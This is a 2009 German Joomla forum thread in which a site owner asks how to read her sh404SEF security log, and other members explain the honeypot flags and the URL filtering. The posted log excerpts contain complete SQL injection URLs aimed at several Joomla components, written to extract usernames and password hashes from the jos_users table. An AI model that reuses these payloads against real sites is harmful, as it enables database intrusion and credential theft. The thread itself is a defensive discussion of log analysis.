sh404SEF_security_log - Auswertung (?)

**tina_** · 19.05.2009 15:09

Hallo!
Eventuell könnte mir ja jemand bezüglich der Logfile-Auswertung (sh404SEF_security_log) behilflich sein? Und falls ja, möglichst auf "deutsch".

(Log stark gekürzt).

Image file name with command in URL
Var contains outbound link: option in URL
Var not numeric: limitstart in URL
Var not numeric: limit in URL

Date / Time / Cause / IP / Name / User agent / Request method / Request URI / Comment /

Edit cybergurk: editiert und angehangen unten als zip.. wegen diversen url etc...

LG Tina

P.S.: Das die "I-Net-Mafia" im Rahmen eines Massenhackings an unserem Server bzw. an verschiedenen Systemen "herumschraubt" ist leider "normal". Nichts Neues (!) (um ihn anschließend als "Zombie" zu missbrauchen, schon klar).
Aber wen interessiert ’s schon?

**tina_** · 21.05.2009 22:23

Eigentlich nicht soooo schwierig...

/gelöscht

**tina_** · 27.05.2009 01:21

2009-05-sh404SEF_security_log.113.zip
(zip - Auszug)

kleiner Auszug:

2009-05-25 15:01:36 Var not numeric: catid in URL 66.29.89.65 remote-acc-dsl****s*****.com libwww-perl/5.76 GET /CMS/index.php?option=com_brightweblinks&Itemid=58&cati d=1%20UNION%20SELECT%201,2,concat(0x25,0x25,0x25,u sername,0x3a,password,0x25,0x25,0x25),4,5,6,7,8,9, 10,11,12,13,14,15,16,17%20FROM%20jos_users%20WHERE %20usertype=0x53757065722041646d696e6973747261746f 72--

2009-05-25 15:01:37 Var not alpha-numeric: id in URL 66.29.89.65 remote-acc-dsl****s*****.com libwww-perl/5.76 GET /CMS/index.php?option=com_versioning&task=edit&id=-83%20UNION%20SELECT%201,concat(0x25,0x25,0x25,user name,0x3a,password,0x25,0x25,0x25),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29%20FROM%20jos_users--

2009-05-25 15:01:02 Caught by Honey Pot Project 66.29.89.65 remote-acc-dsl****s*****.com libwww-perl/5.76 GET /CMS/index.php?option=com_idoblog&task=userblog&userid= 62%20and%201=1%20UNION%20SELECT%20user(),user(),us er(),user(),user(),concat(0x25,0x25,0x25,username, 0x3a,password,0x25,0x25,0x25),user(),user(),user() ,user(),user(),user(),user(),user(),user(),user()% 20FROM%20jos_users-- Type = 5 | Threat= 16 | Act.= 47 | Suspicious, Comment Spammer

2009-05-25 15:01:02 Caught by Honey Pot Project 66.29.89.65 remote-acc-dsl****s*****.com libwww-perl/5.76 GET /CMS/index.php?option=com_flashmagazinedeluxe&Itemid=10 &task=magazine&mag_id=-4+union+select+1,2,3,unhex(hex(concat(0x25,0x25,0x 25,username,0x3a,password,0x25,0x25,0x25))),5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35%20FROM%20jos_users/* Type = 5 | Threat= 16 | Act.= 47 | Suspicious, Comment Spammer

/EDIT:
Eventuell ist diese Log ja interessant (?) zu mal, u. a., "com_flashmagazinedeluxe", "com_idoblog", "com_versioning", "com_brightweblinks" angegriffen wird.
(Als Beispiel für "automatisiertes Bot-Hacking", oder war das etwa ein Mensch)?

Und ich geh man davon aus, das der Bot, der ja entsprechend programmiert wurde, das nicht "nur so" macht.
Vielleicht wird es nun etwas klarer (?), nämlich, warum man "unnötige Komponenten" löschen sollte!?

**tina_** · 25.06.2009 16:23

*push*

Niemand kann /will was dazu sagen? Nun meine Herren, so schwer ist das auch nicht.

Oder vielleicht doch?

Variablen...

Es wäre wirklich nett wenn da mal jemand drüberschauen könnte!

Und warum macht der Bot da eigentlich eine so lange Pause?
2009-05-25 15:01:02 - 2009-05-25 15:01:37
================================================== ===========================

Und was ist mit den com_events-Logs, warum wurden die als "Spammer" beurteilt? Wegen der IP /Client? Weil sie von Honey Pot Project bereits erfasst war?
Und was bedeutet dieses "Act.="

2009-05-25 17:36:57 Caught by Honey Pot Project 190.144.117.170 190.144.117.170 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) GET /CMS/index.php?option=com_content&task=category&section id=1&id=1&Itemid=2 Type = 5 | Threat= 35 | Act.= 2 | Suspicious, Comment Spammer

2009-05-25 17:37:48 Caught by Honey Pot Project 218.123.236.27 softbank218123236027.bbtec.net Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) GET /CMS/index.php?/component/option, com_events/Itemid,92/ Type = 5 | Threat= 20 | Act.= 19 | Suspicious, Comment Spammer

2009-05-25 17:38:00 Caught by Honey Pot Project 74.222.221.250 74-222-221-250.dyn.everestkc.net Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) GET /CMS/index.php?/component/option, com_events/Itemid,92/ Type = 5 | Threat= 21 | Act.= 56 | Suspicious, Comment Spammer

2009-05-25 17:38:05 Caught by Honey Pot Project 130.63.177.192 130.63.177.192 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) GET /CMS/index.php?/component/option, com_events/Itemid,92/ Type = 5 | Threat= 42 | Act.= 2 | Suspicious, Comment Spammer

2009-05-25 17:38:25 Caught by Honey Pot Project 211.75.91.19 tp-s2-c91-19.router.hinet.net Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) GET /CMS/index.php?/component/option, com_events/Itemid,92/ Type = 7 | Threat= 47 | Act.= 1 | Suspicious, Harvester, Comment Spammer

**tina_** · 25.06.2009 18:35

/erledigt - gelöst
(Hatte da eine ru-Seite gefunden, "Mafia", bzw. noch eine andere Seite - auf der waren zig Joomla Component
SQL Injections zu finden. Die sahen dann sehr ähnlich aus, bezogen auf die obigen Logs.)
Und sind sie erst mal in der DB, können sie machen was sie wollen...
(Und wenn sie hinterher die Einträge in der Datenbank löschen, sieht man es noch nicht einmal).

U. a. befanden sich auf der Site auch paar exploits für...

Und exploits/shellcode

Meine Meinung: Vorsicht vor fremden Components & Co.!
Eigentlich nichts Neues, zu mal es ja mitten in Joomla! (Backend/ACP) steht.

**j-worker** · 26.06.2009 20:13

Pushing Tina...

Wurde früher geclosed sowas...

http://www.joomlaportal.de/forenrege...portal-de.html <-- Punkt 13 und BESONDERS Punkt 15!

http://www.joomlaportal.de/forenrege...e-richtig.html <--- Punkt4

**tina_** · 26.06.2009 21:08

Hallo Devil,
lange nicht gesehen – und schön Dich wiederzusehen.

Ich weiß, hast Recht. Habe dann aber auf das Wohlwollen der Moderatoren gehofft - lag ja auch schon ca. 1 Monat dazwischen.

@ Moderatoren & Administratoren.
Nun habe ich mir die meisten Fragen selbst beantwortet – obwohl das auch nicht ganz stimmt. Zumindest hatte ich die Logs bereits vor einigen Wochen an einen Entwickler weitergeleitet. Leider "nur" für dot.net, VB, etc. (Microsoft-Schiene) Ich "zwinge" ihn nun immer sich mit php-codes, Logs, etc. auseinanderzusetzen. Der war sogar ganz überrascht darüber, denn er kam damit relativ gut klar. Der hatte mal in einem seiner Bücher eine Passage über SQL-Injections geschrieben. Insgesamt ein breites, interessantes Gebiet…
Man kann immer nur dazulernen.

LG und ein schönes WE,
Tina

P.S.: Sorry für off-topic.

**Pest** · 26.06.2009 21:30

Hallo

Die Meldungen innerhalb der Logs erklären sich größtenteils praktisch von allein. Passagen mit "Caught by Honey Pot Project" besagen das eine IP-Adresse im weitesten Sinne als "Spammer" in diesem System markiert ist. Das liegt meistens daran das mehrere der angeschlossenen Seiten diese Adresse mit einer verdächtigen Aktivität beobachtet haben. Entsprechende "Honigtöpfe" werden dafür bewußt ausgelegt und bei uns läuft zum Beispiel auch einer.

Davon unabhängig filtert dir das sh404SEF auch potenzielle Angriffe die über die URL, beziehungsweise die Mitgabe über Variablen stattfinden sollen. Dabei handelt es sich - wie von dir schon richtig genannt - fast immer um automatische Abfragen die von einem Skript vorgenommen werden. Ist innerhalb der IP's ein Muster zu erkennen, oder ein spezieller, für dich nicht relevanter ausländischer Provider der Zufluchtsort dieser Person, dann bietet es sich an gleich dessen verwendete Adressbereiche zu sperren. Entsprechende Informationen findest du zum Beispiel recht einfach über http://ripe.net heraus.

Gruß Jan

**tina_** · 26.06.2009 21:47

Hallo Jan,
auch Dich hatte ich lange nicht gesehen – und auch für Dich: Schön Dich wiederzusehen!
(Hatte ganz gerne Deine Beiträge gelesen).
Nun hatte ich in diesem Thema quasi 3 verschiedene Varianten von Logs gepostet. Nicht einfach Licht ins "Dunkle" zu befördern. Du hast mir dabei geholfen – vielen Dank!

Und auch für Dich - schönes Wochenende!

LG Tina

**tina_** · 27.06.2009 13:10

Zitat von Devil

Pushing Tina...

Wurde früher geclosed sowas...
[...]

http://www.joomlaportal.de/forenrege...e-richtig.html <--- Punkt4

4. Unnötiges Pushen unerwünscht!

Falls mal nicht innerhalb von 24 Stunden eine Antwort erfolgen sollte und die Frage nicht mehr auf der ersten Forumsseite des Themas zu sehen ist, ist ein einmaliges Pushen erlaubt. Das heißt, Ihr dürft einmal auf Euer eigenes Thema antworten, um es wieder nach oben zu bringen. [...]

Danke Devil!

LG Tina

Thema: sh404SEF_security_log - Auswertung (?)

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

sh404SEF_security_log - Auswertung (?)

Erhielt Danksagungen von:

Lesezeichen

Lesezeichen

Berechtigungen